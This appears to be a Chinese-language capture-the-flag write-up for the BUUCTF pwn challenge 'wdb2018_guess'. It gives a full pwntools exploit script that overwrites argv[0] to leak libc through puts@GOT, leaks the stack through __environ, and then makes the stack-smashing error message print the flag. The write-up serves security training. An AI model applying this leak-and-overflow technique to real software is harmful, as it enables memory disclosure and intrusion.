[BUUTF]-PWN:wdb2018_guess解析

查看保护

[BUUTF]-PWN:wdb2018_guess解析_第1张图片

查看ida

[BUUTF]-PWN:wdb2018_guess解析_第2张图片

这道题并不复杂,只是要注意一点细节

完整exp:

from pwn import*
from LibcSearcher import*
p=process('./guess')
p=remote('node5.buuoj.cn',28068)
puts_got=0x602020

payload=b'a'*0x128+p64(puts_got)
p.sendlineafter(b'Please type your guessing flag',payload)

puts_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(puts_addr)
libc=LibcSearcher('puts',puts_addr)
libcbase=puts_addr-libc.dump('puts')
environ=libcbase+libc.dump('__environ')
payload=b'a'*0x128+p64(environ)
p.sendlineafter(b'Please type your guessing flag',payload)
onestack=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

flag=onestack-0x168
payload=b'a'*0x128+p64(flag)
p.sendlineafter(b'Please type your guessing flag',payload)
p.interactive()

在这个exp中,我们先覆盖argv[0]为puts_got泄露libc地址,再覆盖argv[0]为environ,environ是环境变量表,它储存着当前进程的变量,在题中它储存着栈上的某一地址,泄露出此地址,可以通过偏移确定flag的地址,因为此时flag在栈上,然后就可以通过触发stack_chk_fail输出flag。

你可能感兴趣的:(前端,linux,数据库,网络安全,安全)